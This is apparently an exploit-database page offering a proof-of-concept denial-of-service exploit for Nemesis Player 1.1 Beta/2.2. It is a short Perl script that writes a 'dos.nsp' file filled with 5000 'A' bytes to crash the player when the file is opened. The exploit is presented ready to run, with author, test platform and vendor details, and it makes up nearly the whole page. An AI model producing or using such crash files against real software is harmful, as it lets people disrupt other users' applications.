[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability

Author
Rehan Ahmed
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10076
Category
dos / poc
Date add
13-01-2010
Platform
unsorted
================================================================
Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
================================================================

#!/usr/bin/perl
#Exploit Title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
#Author:Vulnerability Discovered By Rehan Ahmed 
#Vendor:http://www.nsplayer.org
#Version:1.1 Beta/2.2
#Tested On: WinXP SP2
 
my $boom="\x41" x 5000;
my $file="dos.nsp";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";


#  0day.today [2024-11-16]  #